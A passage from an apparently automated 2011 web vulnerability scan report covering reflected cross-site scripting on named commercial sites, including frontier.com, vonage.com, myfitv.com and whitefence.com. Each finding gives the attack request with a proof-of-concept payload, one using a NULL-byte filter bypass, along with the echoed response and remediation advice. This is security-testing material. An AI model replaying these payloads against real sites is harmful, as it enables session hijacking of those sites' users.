Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shop293ac'-alert(1)-'b884da74b02dcdeaf/Login.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=...[SNIP]...&hfPageType=1&hfRecord_Type=Category&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtVaAcctNum=67654764575467&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtVaPin=6457&ctl00%24ctl00%24FOBasePH%24ContentPH%24imbSubmit.x=12&ctl00%24ctl00%24FOBasePH%24ContentPH%24imbSubmit.y=3&phoneNumA=&phoneNumB=&phoneNumC=&zipCode= HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/Shop/Login.aspx
Cache-Control: max-age=0
Origin: https://www.frontier.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=ks40bd45i0qr22450as2ev2m; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%252520Login%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fwww.frontier.com%25252Fimages%25252Fbtn_submit_shop.gif%2526ot%253DIMAGE%26oberonfrontier%3D%2526pid%253DhomePage%2526pidt%253D1%2526oid%253Dhttp%25253A%252F%252Fgames.frontier.com%252Fgame.htm%25253Fcode%25253D119282623%252526lc%25253Den%252526channel%25253D110464377%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/Shop293ac'-alert(1)-'b884da74b02dcdeaf/Login.aspx');//]]>
...[SNIP]...

2.100. https://www.frontier.com/Shop/Login.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Shop/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc7ba'-alert(1)-'0140388e784 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopcc7ba'-alert(1)-'0140388e784/Login.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43342


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/Shopcc7ba'-alert(1)-'0140388e784/Login.aspx');//]]>
...[SNIP]...

2.101. https://www.frontier.com/Shop/Login.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Shop/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66bbb'%3balert(1)//84be4a726c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66bbb';alert(1)//84be4a726c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shop/Login.aspx?66bbb'%3balert(1)//84be4a726c9=1 HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/Shop/Login.aspx?66bbb';alert(1)//84be4a726c9=1');
var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}

function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return Va
...[SNIP]...

2.102. http://www.myfitv.com/search [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /search

Issue detail

The value of the query request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %003d6ce'%3balert(1)//9336b0fa1c5 was submitted in the query parameter. This input was echoed as 3d6ce';alert(1)//9336b0fa1c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /search?utf8=%E2%9C%93&query=xss%003d6ce'%3balert(1)//9336b0fa1c5 HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; fitvuser=fitvuser_etiamsodalesorciat; __qca=P0-216653065-1315331121961; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.4.9.1315331433305; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=158259878.visitor|1=Arrived=2011-09-06=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:53:02 GMT
ETag: "64e6744e7db5d324afec0f75d50866d0"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIkYvc2VhcmNoP3V0Zjg9JUUyJTlDJTkzJnF1ZXJ5PXhzcyUwMDNkNmNlJyUzYmFsZXJ0KDEpLy85MzM2YjBmYTFjNSIPc2Vzc2lvbl9pZCIlOGU3YzU1NTZjOWE3MTdkM2QzZDIzMDI5ZmE1Y2MyODI%3D--bb6a866ba6baf3100ee2ded8fc9da2d273d6affa; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 1.381151
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 31113
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
<script type="text/javascript">
// setting g
...[SNIP]...
}
       })
   }

   function update_media_type() {
       if ($('#media_type') != 'Local') {
           $('#state').val('All')
           $('#city').val('All')
       }
       $('#query_form').submit();
   }
   
   $("#search_header").val('xss.3d6ce';alert(1)//9336b0fa1c5');
$("#search_header").addClass('black');
   

</script>
...[SNIP]...

2.103. http://www.vonage.com/search.php [lang_cntry parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The value of the lang_cntry request parameter is copied into an HTML comment. The payload a9f48--><script>alert(1)</script>f9e759be4e4 was submitted in the lang_cntry parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_usa9f48--><script>alert(1)</script>f9e759be4e4 HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:59:47 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!-- extsearch.vonagenetworks.net/search?client=von_usa9f48--><script>alert(1)</script>f9e759be4e4_en_home&site=prod_sup_en_usa9f48-->
...[SNIP]...

2.104. http://www.vonage.com/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 58895--><script>alert(1)</script>b4b4607adfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=e/58895--><script>alert(1)</script>b4b4607adfbn_us HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:59:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!-- extsearch.vonagenetworks.net/search?client=von_us_e/58895--><script>alert(1)</script>b4b4607adfbn_home&site=prod_sup_e/58895-->
...[SNIP]...

2.105. http://www.vonage.com/search.php [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b46c6</script><script>alert(1)</script>eae8d3091a9 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?q=xssb46c6</script><script>alert(1)</script>eae8d3091a9&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:59:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
on the custom 404 page - only takes one string value "errorPage"
       s.prop1=""
       s.prop10=""
       s.prop11="MainSite"
       s.prop12=""
       s.prop13=""
       s.prop14=""
       s.prop15=""
       s.prop43="xssb46c6</script><script>alert(1)</script>eae8d3091a9"
s.prop44="0"

       /* Hierarchy Variables */
       s.hier1="US/VDV/Vonagecom"
       /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
       var s_code=s.t();if(s_code)document.write(s_co
...[SNIP]...

2.106. http://www.vonage.com/search.php [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec63"><script>alert(1)</script>400bf562542 was submitted in the q parameter. This input was echoed as cec63\"><script>alert(1)</script>400bf562542 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php?q=xsscec63"><script>alert(1)</script>400bf562542&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:59:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<link rel="canonical" href="http://www.vonage.com/search.php?q=xsscec63\"><script>alert(1)</script>400bf562542" />
...[SNIP]...

2.107. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 3bcd1--><img%20src%3da%20onerror%3dalert(1)>45f3ff68f71 was submitted in the REST URL parameter 2. This input was echoed as 3bcd1--><img src=a onerror=alert(1)>45f3ff68f71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/high-speed-internet3bcd1--><img%20src%3da%20onerror%3dalert(1)>45f3ff68f71/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/television-service/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:50 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--
body.high-speed-internet3bcd1--><img src=a onerror=alert(1)>45f3ff68f71 div#body div.description {
background: url(/objects/images/catBacks/980/high-speed-internet3bcd1-->
...[SNIP]...

2.108. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23bef"><img%20src%3da%20onerror%3dalert(1)>affc43fb5c2 was submitted in the REST URL parameter 2. This input was echoed as 23bef"><img src=a onerror=alert(1)>affc43fb5c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/high-speed-internet23bef"><img%20src%3da%20onerror%3dalert(1)>affc43fb5c2/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/television-service/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:40 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<body class="category-view high-speed-internet23bef"><img src=a onerror=alert(1)>affc43fb5c2">
...[SNIP]...

2.109. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbfd8"%3bf1bc04b1680 was submitted in the REST URL parameter 2. This input was echoed as cbfd8";f1bc04b1680 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/high-speed-internetcbfd8"%3bf1bc04b1680/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/television-service/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:41 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--

